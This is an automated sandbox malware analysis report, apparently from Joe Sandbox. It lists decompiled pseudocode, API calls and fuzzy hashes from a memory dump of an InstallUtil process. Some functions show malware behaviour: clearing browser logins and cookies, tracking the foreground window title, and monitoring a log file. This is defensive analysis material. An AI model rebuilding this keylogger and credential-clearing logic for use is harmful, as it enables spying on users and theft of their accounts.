                                                                      						_pop(_t54);
                                                                      						__eflags = _t63;
                                                                      						if(_t63 != 0) {
                                                                      							_v12 = E004403BF(_t54, _t59, 0x8000);
                                                                      							_t34 = _v8;
                                                                      							_pop(_t56);
                                                                      							do {
                                                                      								__eflags = _t34;
                                                                      								if(__eflags < 0) {
                                                                      									L13:
                                                                      									_t35 = _t46;
                                                                      									L14:
                                                                      									_t36 = E004468E3(_t46, _t59, _t63, _t59, _t63, _t35);
                                                                      									_t66 = _t66 + 0xc;
                                                                      									__eflags = _t36 - 0xffffffff;
                                                                      									if(_t36 == 0xffffffff) {
                                                                      										_t37 = E0043992E();
                                                                      										__eflags =  *_t37 - 5;
                                                                      										if( *_t37 == 5) {
                                                                      											 *((intOrPtr*)(E00439941())) = 0xd;
                                                                      										}
                                                                      										L23:
                                                                      										_t38 = E00439941();
                                                                      										E004427C2(_t63);
                                                                      										_t23 =  *_t38;
                                                                      										goto L31;
                                                                      									}
                                                                      									asm("cdq");
                                                                      									_t46 = _t46 - _t36;
                                                                      									_t34 = _v8;
                                                                      									asm("sbb eax, edx");
                                                                      									_v8 = _t34;
                                                                      									__eflags = _t34;
                                                                      									if(__eflags > 0) {
                                                                      										L12:
                                                                      										_t35 = 0x1000;
                                                                      										goto L14;
                                                                      									}
                                                                      									if(__eflags < 0) {
                                                                      										break;
                                                                      									}
                                                                      									goto L17;
                                                                      								}
                                                                      								if(__eflags > 0) {
                                                                      									goto L12;
                                                                      								}
                                                                      								__eflags = _t46 - 0x1000;
                                                                      								if(_t46 < 0x1000) {
                                                                      									goto L13;
                                                                      								}
                                                                      								goto L12;
                                                                      								L17:
                                                                      								__eflags = _t46;
                                                                      							} while (_t46 != 0);
                                                                      							E004403BF(_t56, _t59, _v12);
                                                                      							E004427C2(_t63);
                                                                      							_t66 = _t66 + 0xc;
                                                                      							_t61 = 0;
                                                                      							__eflags = 0;
                                                                      							goto L19;
                                                                      						}
                                                                      						 *((intOrPtr*)(E00439941())) = 0xc;
                                                                      						goto L23;
                                                                      					}
                                                                      					__eflags = _t46;
                                                                      					if(_t46 <= 0) {
                                                                      						goto L24;
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				L1:
                                                                      				return  *((intOrPtr*)(E00439941()));
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 9711a2f99938f2f25c0dfd81e7f0ec9e40ef999c5bffbe70b20706e8bc09e90a
                                                                      • Instruction ID: a58d51ee336de0d36d6904bac323c9a3c4596844ebc27f8faf091d308a43ed6a
                                                                      • Opcode Fuzzy Hash: 9711a2f99938f2f25c0dfd81e7f0ec9e40ef999c5bffbe70b20706e8bc09e90a
                                                                      • Instruction Fuzzy Hash: E3412771A002006BEB31AEBA8D81B6F36A4EF56735F14425BFC1496393D7FC8C45926A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E0043E8C1(void* _a4, intOrPtr* _a8) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				char _v16;
                                                                      				signed int _t44;
                                                                      				char _t47;
                                                                      				intOrPtr _t50;
                                                                      				signed int _t52;
                                                                      				signed int _t56;
                                                                      				signed int _t57;
                                                                      				void* _t59;
                                                                      				signed int _t63;
                                                                      				signed int _t65;
                                                                      				char _t67;
                                                                      				intOrPtr* _t68;
                                                                      				intOrPtr* _t69;
                                                                      				intOrPtr* _t71;
                                                                      				intOrPtr _t75;
                                                                      				void* _t76;
                                                                      				void* _t77;
                                                                      				signed int _t80;
                                                                      				intOrPtr _t82;
                                                                      				void* _t86;
                                                                      				signed int _t87;
                                                                      				void* _t89;
                                                                      				signed int _t91;
                                                                      				intOrPtr* _t98;
                                                                      				void* _t101;
                                                                      				intOrPtr _t102;
                                                                      				intOrPtr _t103;
                                                                      
                                                                      				_t101 = _a4;
                                                                      				if(_t101 != 0) {
                                                                      					_t80 = 9;
                                                                      					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                                                                      					_t98 = _a8;
                                                                      					__eflags = _t98;
                                                                      					if(_t98 != 0) {
                                                                      						_t82 =  *((intOrPtr*)(_t98 + 4));
                                                                      						_t47 =  *_t98;
                                                                      						_v16 = _t47;
                                                                      						_v12 = _t82;
                                                                      						__eflags = _t82 - 0xffffffff;
                                                                      						if(__eflags > 0) {
                                                                      							L7:
                                                                      							_t89 = 7;
                                                                      							__eflags = _t82 - _t89;
                                                                      							if(__eflags < 0) {
                                                                      								L12:
                                                                      								_v5 = 0;
                                                                      								_t50 = E0043EA0E(_t82, __eflags,  &_v16,  &_v5);
                                                                      								_t75 = _v16;
                                                                      								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                                                                      								_t52 = E004532B0(_t75, _v12, 0x15180, 0);
                                                                      								 *(_t101 + 0x1c) = _t52;
                                                                      								_t86 = 0x45a280;
                                                                      								_t76 = _t75 - _t52 * 0x15180;
                                                                      								asm("sbb eax, edx");
                                                                      								__eflags = _v5;
                                                                      								if(_v5 == 0) {
                                                                      									_t86 = 0x45a24c;
                                                                      								}
                                                                      								_t91 =  *(_t101 + 0x1c);
                                                                      								_t56 = 1;
                                                                      								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                                                                      								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                                                                      									L16:
                                                                      									_t57 = _t56 - 1;
                                                                      									 *(_t101 + 0x10) = _t57;
                                                                      									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                                                                      									_t59 = E004532B0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                                                                      									_t87 = 7;
                                                                      									asm("cdq");
                                                                      									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                                                                      									_t63 = E004532B0(_t76, _v12, 0xe10, 0);
                                                                      									 *(_t101 + 8) = _t63;
                                                                      									_t77 = _t76 - _t63 * 0xe10;
                                                                      									asm("sbb edi, edx");
                                                                      									_t65 = E004532B0(_t77, _v12, 0x3c, 0);
                                                                      									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                                                                      									 *(_t101 + 4) = _t65;
                                                                      									_t67 = 0;
                                                                      									__eflags = 0;
                                                                      									 *_t101 = _t77 - _t65 * 0x3c;
                                                                      									L17:
                                                                      									return _t67;
                                                                      								} else {
                                                                      									do {
                                                                      										_t56 = _t56 + 1;
                                                                      										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                                                                      									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      							if(__eflags > 0) {
                                                                      								L10:
                                                                      								_t68 = E00439941();
                                                                      								_t102 = 0x16;
                                                                      								 *_t68 = _t102;
                                                                      								L11:
                                                                      								_t67 = _t102;
                                                                      								goto L17;
                                                                      							}
                                                                      							__eflags = _t47 - 0x934126cf;
                                                                      							if(__eflags <= 0) {
                                                                      								goto L12;
                                                                      							}
                                                                      							goto L10;
                                                                      						}
                                                                      						if(__eflags < 0) {
                                                                      							goto L10;
                                                                      						}
                                                                      						__eflags = _t47 - 0xffff5740;
                                                                      						if(_t47 < 0xffff5740) {
                                                                      							goto L10;
                                                                      						}
                                                                      						goto L7;
                                                                      					}
                                                                      					_t69 = E00439941();
                                                                      					_t102 = 0x16;
                                                                      					 *_t69 = _t102;
                                                                      					E0043862C();
                                                                      					goto L11;
                                                                      				}
                                                                      				_t71 = E00439941();
                                                                      				_t103 = 0x16;
                                                                      				 *_t71 = _t103;
                                                                      				E0043862C();
                                                                      				return _t103;
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41d7d1fd1c36d080117e95db1f1fb7787f251b423cc2fcf4f76076f7352111f3
                                                                      • Instruction ID: 584172cc98d6fee99927fbde0a86b9851514b38a9ee259d400df271909638988
                                                                      • Opcode Fuzzy Hash: 41d7d1fd1c36d080117e95db1f1fb7787f251b423cc2fcf4f76076f7352111f3
                                                                      • Instruction Fuzzy Hash: CA4114B1A00704AFD7259F7AC841B6EBBA8EF8C710F10916FF111DB3C1D679A9058788
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0040A697(void* __edi) {
                                                                      				char _v5;
                                                                      				char _v6;
                                                                      				char _v7;
                                                                      				void* __ebx;
                                                                      				void* __ecx;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t18;
                                                                      				void* _t36;
                                                                      				intOrPtr _t40;
                                                                      				char _t50;
                                                                      				void* _t52;
                                                                      				void* _t53;
                                                                      				signed int _t54;
                                                                      				signed int _t55;
                                                                      				void* _t56;
                                                                      
                                                                      				_t52 = __edi;
                                                                      				_t55 = _t54 & 0xfffffff8;
                                                                      				 *0x46dae6 = 1;
                                                                      				Sleep( *0x46daec);
                                                                      				_v7 = 0;
                                                                      				_t36 = 0;
                                                                      				_v6 = 0;
                                                                      				_v5 = 0;
                                                                      				goto L1;
                                                                      				do {
                                                                      					do {
                                                                      						L1:
                                                                      						_t60 = _t36;
                                                                      						if(_t36 == 0) {
                                                                      							L2:
                                                                      							_t36 = E0040A57D(_t60);
                                                                      						}
                                                                      						_t61 = _t36;
                                                                      						if(_t36 == 0) {
                                                                      							_t36 = E0040A3CB(_t50, _t52, _t61);
                                                                      						}
                                                                      						_t62 = _v6;
                                                                      						if(_v6 == 0) {
                                                                      							_v6 = E0040A1C4(_t36, _t50, _t52, _t62);
                                                                      						}
                                                                      						_t63 = _v7;
                                                                      						if(_v7 == 0) {
                                                                      							_v7 = E0040A135(_t50, _t52, _t63);
                                                                      						}
                                                                      						_t50 = _v5;
                                                                      						_t64 = _t50;
                                                                      						if(_t50 == 0) {
                                                                      							_t50 = E0040A0A6(_t50, _t52, _t64);
                                                                      							_v5 = _t50;
                                                                      						}
                                                                      						if(_t36 == 0 || _t36 == 0) {
                                                                      							L16:
                                                                      							Sleep(0x1388);
                                                                      							_t18 = _v7;
                                                                      							_t40 = _v6;
                                                                      							_t50 = _v5;
                                                                      						} else {
                                                                      							_t18 = _v7;
                                                                      							if(_t18 == 0 || _t50 == 0) {
                                                                      								goto L16;
                                                                      							} else {
                                                                      								_t40 = _v6;
                                                                      								if(_t40 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_t36 == 0) {
                                                                      							goto L2;
                                                                      						}
                                                                      					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                                                                      					_t74 = _t40;
                                                                      				} while (_t40 == 0);
                                                                      				_t56 = _t55 - 0x18;
                                                                      				E00402053(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
                                                                      				E0040A863(_t36, _t50, _t53, _t74);
                                                                      				E00402053(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
                                                                      				_t57 = _t56 - 0x18;
                                                                      				E00402053(_t36, _t56 - 0x18, _t50, _t53, "i");
                                                                      				E00417D02(_t36, _t52);
                                                                      				E00402053(_t36, _t57 + 0x18, _t50, _t53, 0x461084);
                                                                      				_push(0xaf);
                                                                      				E00404A78(0x46e850, _t50, _t74);
                                                                      				if( *0x46dae5 != 0) {
                                                                      					E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "FR", 1);
                                                                      				}
                                                                      				 *0x46dae6 = 0;
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      Strings
                                                                      • Cleared browsers logins and cookies., xrefs: 0040A780
                                                                      • [Cleared browsers logins and cookies.], xrefs: 0040A76F
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                      • API String ID: 3472027048-1236744412
                                                                      • Opcode ID: 2aa8957c3352b7599dfa9f55aa1e754481a577638ade0eab3824b6afb9cc6c57
                                                                      • Instruction ID: b00251936bdab44578a8662cefa7add838aa51f8e85430aea89b5e0fe6c95023
                                                                      • Opcode Fuzzy Hash: 2aa8957c3352b7599dfa9f55aa1e754481a577638ade0eab3824b6afb9cc6c57
                                                                      • Instruction Fuzzy Hash: F531A60164C3816EDA1177B514567AB6BA10E53788F0C887FF8C42B3D3E97A4819936F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E00408C31() {
                                                                      				char _v2004;
                                                                      				char _v2012;
                                                                      				char _v2028;
                                                                      				void* _v2036;
                                                                      				char _v2056;
                                                                      				void* _v2060;
                                                                      				char _v2080;
                                                                      				void* _v2084;
                                                                      				void* _t15;
                                                                      				signed int _t17;
                                                                      				void* _t29;
                                                                      				void* _t31;
                                                                      				void* _t33;
                                                                      				void* _t34;
                                                                      				void* _t57;
                                                                      				void* _t61;
                                                                      				signed int _t62;
                                                                      				signed int _t63;
                                                                      				void* _t64;
                                                                      				void* _t65;
                                                                      				void* _t66;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      
                                                                      				_t63 = _t62 & 0xfffffff8;
                                                                      				_t69 = _t63;
                                                                      				_t64 = _t63 - 0x81c;
                                                                      				_push(_t33);
                                                                      				_t59 = _t34;
                                                                      				_t61 = _t34 + 0x60;
                                                                      				while(1) {
                                                                      					E004337A0(_t57,  &_v2004, 0, 0x7d0);
                                                                      					_t65 = _t64 + 0xc;
                                                                      					while(1) {
                                                                      						_t15 = E00401F6B(E00401E25(0x46e600, _t55, _t61, _t69, 0x2a));
                                                                      						_t66 = _t65 - 0x18;
                                                                      						E0040413E(_t33, _t66, _t55, _t61, _t15);
                                                                      						_t17 = E00418A82( &_v2012, _t55);
                                                                      						_t65 = _t66 + 0x18;
                                                                      						_t69 = _t17;
                                                                      						if(_t17 != 0) {
                                                                      							break;
                                                                      						}
                                                                      						Sleep(0x1f4);
                                                                      					}
                                                                      					_t55 = E004042BC(_t33,  &_v2056, L"\r\n[ ", _t61, __eflags, E0040413E(_t33,  &_v2028, _t55, _t61,  &_v2004));
                                                                      					E00401ED3(_t59 + 4, _t20, _t59, E00402FD4(_t33,  &_v2080, _t20, _t57, _t61, __eflags, L" ]\r\n"));
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					_t67 = _t65 - 0x18;
                                                                      					E0040773A(_t33, _t67, _t55, __eflags, _t61);
                                                                      					E00408935(_t59, _t55);
                                                                      					while(1) {
                                                                      						_t29 = E00401F6B(E00401E25(0x46e600, _t55, _t61, __eflags, 0x2a));
                                                                      						_t68 = _t67 - 0x18;
                                                                      						E0040413E(_t33, _t68, _t55, _t61, _t29);
                                                                      						_t31 = E00418A82(0, _t55);
                                                                      						_t64 = _t68 + 0x18;
                                                                      						__eflags = _t31;
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						Sleep(0x64);
                                                                      					}
                                                                      					E00409767(_t33, _t59, _t55);
                                                                      				}
                                                                      			}

                                                                      0x00408c34
                                                                      0x00408c34
                                                                      0x00408c37
                                                                      0x00408c3d
                                                                      0x00408c40
                                                                      0x00408c42
                                                                      0x00408c45
                                                                      0x00408c51
                                                                      0x00408c56
                                                                      0x00408c59
                                                                      0x00408c67
                                                                      0x00408c6c
                                                                      0x00408c72
                                                                      0x00408c7b
                                                                      0x00408c80
                                                                      0x00408c83
                                                                      0x00408c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00408c8c
                                                                      0x00408c8c
                                                                      0x00408cb7
                                                                      0x00408cc7
                                                                      0x00408cd0
                                                                      0x00408cd9
                                                                      0x00408ce2
                                                                      0x00408ce7
                                                                      0x00408ced
                                                                      0x00408cf4
                                                                      0x00408cf9
                                                                      0x00408d07
                                                                      0x00408d0c
                                                                      0x00408d12
                                                                      0x00408d19
                                                                      0x00408d1e
                                                                      0x00408d21
                                                                      0x00408d23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00408d27
                                                                      0x00408d27
                                                                      0x00408d31
                                                                      0x00408d31

                                                                      APIs
                                                                        • Part of subcall function 00418A82: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00418A92
                                                                        • Part of subcall function 00418A82: GetWindowTextLengthW.USER32(00000000), ref: 00418A9B
                                                                        • Part of subcall function 00418A82: GetWindowTextW.USER32 ref: 00418AC5
                                                                      • Sleep.KERNEL32(000001F4), ref: 00408C8C
                                                                      • Sleep.KERNEL32(00000064), ref: 00408D27
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$SleepText$ForegroundLength
                                                                      • String ID: [ $ ]
                                                                      • API String ID: 3309952895-93608704
                                                                      • Opcode ID: 164a3672678753d05f8dd4a575bbbfc0e102b175466a17809f58e842cb3beba3
                                                                      • Instruction ID: 2d077f06fb0b53fc2435ad47f7fa176651a9889b4a2047f2feae98045539953f
                                                                      • Opcode Fuzzy Hash: 164a3672678753d05f8dd4a575bbbfc0e102b175466a17809f58e842cb3beba3
                                                                      • Instruction Fuzzy Hash: 9621A17160430057D608BB76DD179AE32A89F91349F40047FF982671E3FE3D9A49869F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0043FB12(signed int __eax, void* __ecx) {
                                                                      				signed int _t2;
                                                                      				signed int _t3;
                                                                      				int _t10;
                                                                      				int _t11;
                                                                      				void* _t13;
                                                                      				short** _t16;
                                                                      				char* _t19;
                                                                      				void* _t20;
                                                                      
                                                                      				_t13 = __ecx;
                                                                      				_t16 =  *0x46d4d4; // 0x11ef008
                                                                      				if(_t16 != 0) {
                                                                      					_t10 = 0;
                                                                      					while( *_t16 != _t10) {
                                                                      						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                                                                      						_t11 = _t2;
                                                                      						if(_t11 == 0) {
                                                                      							L11:
                                                                      							_t3 = _t2 | 0xffffffff;
                                                                      						} else {
                                                                      							_t19 = E00441BB3(_t13, _t11, 1);
                                                                      							_pop(_t13);
                                                                      							if(_t19 == 0) {
                                                                      								L10:
                                                                      								_t2 = E004427C2(_t19);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								_t10 = 0;
                                                                      								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									_push(0);
                                                                      									_push(_t19);
                                                                      									E0044B830();
                                                                      									E004427C2(0);
                                                                      									_t20 = _t20 + 0xc;
                                                                      									_t16 =  &(_t16[1]);
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t3;
                                                                      						goto L12;
                                                                      					}
                                                                      					_t3 = 0;
                                                                      					goto L9;
                                                                      				} else {
                                                                      					return __eax | 0xffffffff;
                                                                      				}
                                                                      				L12:
                                                                      			}


                                                                      0x0043fb12
                                                                      0x0043fb15
                                                                      0x0043fb1d
                                                                      0x0043fb26
                                                                      0x0043fb7b
                                                                      0x0043fb34
                                                                      0x0043fb3a
                                                                      0x0043fb3e
                                                                      0x0043fb8c
                                                                      0x0043fb8c
                                                                      0x0043fb40
                                                                      0x0043fb48
                                                                      0x0043fb4b
                                                                      0x0043fb4e
                                                                      0x0043fb85
                                                                      0x0043fb86
                                                                      0x00000000
                                                                      0x0043fb50
                                                                      0x0043fb5a
                                                                      0x0043fb66
                                                                      0x00000000
                                                                      0x0043fb68
                                                                      0x0043fb68
                                                                      0x0043fb69
                                                                      0x0043fb6a
                                                                      0x0043fb70
                                                                      0x0043fb75
                                                                      0x0043fb78
                                                                      0x00000000
                                                                      0x0043fb78
                                                                      0x0043fb66
                                                                      0x0043fb4e
                                                                      0x0043fb81
                                                                      0x0043fb84
                                                                      0x00000000
                                                                      0x0043fb84
                                                                      0x0043fb7f
                                                                      0x00000000
                                                                      0x0043fb1f
                                                                      0x0043fb23
                                                                      0x0043fb23
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d72e44e0ec8390672a1a3b6757f80fc9a006d94aa1a43facb9091b1ede0e297
                                                                      • Instruction ID: 61742a2cb01b0248c3e3862991cb4d85dd77d14b0be68fabd2aaf05b5dde1b77
                                                                      • Opcode Fuzzy Hash: 9d72e44e0ec8390672a1a3b6757f80fc9a006d94aa1a43facb9091b1ede0e297
                                                                      • Instruction Fuzzy Hash: 6E018FF2A092167EF6211679ACD1F27A24CDB997B8F21233BF521512D2EA68AC444168
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0043FB91(signed int __eax, void* __ecx) {
                                                                      				signed int _t2;
                                                                      				signed int _t3;
                                                                      				int _t10;
                                                                      				int _t11;
                                                                      				void* _t13;
                                                                      				char** _t16;
                                                                      				short* _t19;
                                                                      				void* _t20;
                                                                      
                                                                      				_t13 = __ecx;
                                                                      				_t16 =  *0x46d4d0; // 0x11ec7e0
                                                                      				if(_t16 != 0) {
                                                                      					_t10 = 0;
                                                                      					while( *_t16 != _t10) {
                                                                      						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                                                                      						_t11 = _t2;
                                                                      						if(_t11 == 0) {
                                                                      							L11:
                                                                      							_t3 = _t2 | 0xffffffff;
                                                                      						} else {
                                                                      							_t19 = E00441BB3(_t13, _t11, 2);
                                                                      							_pop(_t13);
                                                                      							if(_t19 == 0) {
                                                                      								L10:
                                                                      								_t2 = E004427C2(_t19);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								_t10 = 0;
                                                                      								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									_push(0);
                                                                      									_push(_t19);
                                                                      									E0044B83B(_t13);
                                                                      									E004427C2(0);
                                                                      									_t20 = _t20 + 0xc;
                                                                      									_t16 =  &(_t16[1]);
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t3;
                                                                      						goto L12;
                                                                      					}
                                                                      					_t3 = 0;
                                                                      					goto L9;
                                                                      				} else {
                                                                      					return __eax | 0xffffffff;
                                                                      				}
                                                                      				L12:
                                                                      			}

                                                                      0x0043fb91
                                                                      0x0043fb94
                                                                      0x0043fb9c
                                                                      0x0043fba5
                                                                      0x0043fbf4
                                                                      0x0043fbb1
                                                                      0x0043fbb7
                                                                      0x0043fbbb
                                                                      0x0043fc05
                                                                      0x0043fc05
                                                                      0x0043fbbd
                                                                      0x0043fbc5
                                                                      0x0043fbc8
                                                                      0x0043fbcb
                                                                      0x0043fbfe
                                                                      0x0043fbff
                                                                      0x00000000
                                                                      0x0043fbcd
                                                                      0x0043fbd3
                                                                      0x0043fbdf
                                                                      0x00000000
                                                                      0x0043fbe1
                                                                      0x0043fbe1
                                                                      0x0043fbe2
                                                                      0x0043fbe3
                                                                      0x0043fbe9
                                                                      0x0043fbee
                                                                      0x0043fbf1
                                                                      0x00000000
                                                                      0x0043fbf1
                                                                      0x0043fbdf
                                                                      0x0043fbcb
                                                                      0x0043fbfa
                                                                      0x0043fbfd
                                                                      0x00000000
                                                                      0x0043fbfd
                                                                      0x0043fbf8
                                                                      0x00000000
                                                                      0x0043fb9e
                                                                      0x0043fba2
                                                                      0x0043fba2
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 640fe06590b17db744a07aac0ad997ccfa506d422f73d5a74404842cb45e4370
                                                                      • Instruction ID: c65ecd6e1ceaf62599d570985ab8440679af588d9a66c02d8e6343f6cfe620e1
                                                                      • Opcode Fuzzy Hash: 640fe06590b17db744a07aac0ad997ccfa506d422f73d5a74404842cb45e4370
                                                                      • Instruction Fuzzy Hash: 2101D1F2A093167EB6101A7AACD0D27A25DDF953BCB30633BF522512D2EE78DC054168
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00408D9F(void* __ecx, char* __edx) {
                                                                      				void* __ebx;
                                                                      				signed int _t8;
                                                                      				int _t9;
                                                                      				long _t14;
                                                                      				char* _t22;
                                                                      				void* _t23;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      				void* _t30;
                                                                      
                                                                      				_t22 = __edx;
                                                                      				_t8 =  *0x46e450; // 0x0
                                                                      				_t9 = _t8 |  *0x46e454;
                                                                      				_t24 = __ecx;
                                                                      				if(_t9 != 0) {
                                                                      					 *((char*)(__ecx + 0x39)) = 0;
                                                                      					do {
                                                                      						_t9 = CreateFileW(E00401EC4(0x46e408), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                      						_t23 = _t9;
                                                                      						if(_t23 == 0xffffffff) {
                                                                      							 *((char*)(_t24 + 0x39)) = 0;
                                                                      						} else {
                                                                      							_t14 = GetFileSize(_t23, 0);
                                                                      							_t30 = 0 -  *0x46e454; // 0x0
                                                                      							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46e450)) {
                                                                      								 *((char*)(_t24 + 0x39)) = 1;
                                                                      								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                                                                      									E00409767(0, _t24, _t22);
                                                                      								}
                                                                      								Sleep(0x2710);
                                                                      							}
                                                                      							_t9 = CloseHandle(_t23);
                                                                      						}
                                                                      					} while ( *((char*)(_t24 + 0x39)) == 1);
                                                                      					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                                                                      						_t35 =  *0x46c9c4 - 0x31;
                                                                      						if( *0x46c9c4 == 0x31) {
                                                                      							E0040773A(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
                                                                      							return E00408935(_t24, _t22);
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t9;
                                                                      			}
                                                                      0x00408d9f
                                                                      0x00408d9f
                                                                      0x00408da4
                                                                      0x00408dad
                                                                      0x00408daf
                                                                      0x00408db7
                                                                      0x00408dba
                                                                      0x00408dd5
                                                                      0x00408ddb
                                                                      0x00408de0
                                                                      0x00408e20
                                                                      0x00408de2
                                                                      0x00408de4
                                                                      0x00408dea
                                                                      0x00408df0
                                                                      0x00408dfc
                                                                      0x00408e03
                                                                      0x00408e07
                                                                      0x00408e07
                                                                      0x00408e11
                                                                      0x00408e11
                                                                      0x00408e18
                                                                      0x00408e18
                                                                      0x00408e23
                                                                      0x00408e2c
                                                                      0x00408e2e
                                                                      0x00408e35
                                                                      0x00408e40
                                                                      0x00000000
                                                                      0x00408e47
                                                                      0x00408e35
                                                                      0x00408e2c
                                                                      0x00408e4f

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408E77), ref: 00408DD5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408E77), ref: 00408DE4
                                                                      • Sleep.KERNEL32(00002710,?,?,?,00408E77), ref: 00408E11
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00408E77), ref: 00408E18
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                                      • String ID:
                                                                      • API String ID: 1958988193-0
                                                                      • Opcode ID: f905a2d68622227e5be47e99eb810132b5bf02293294938ac2a4d3deb26d20fb
                                                                      • Instruction ID: 283b43333eec9af8eeb0139d1d082ccfa4e1d47229b59270266cc477961fc445
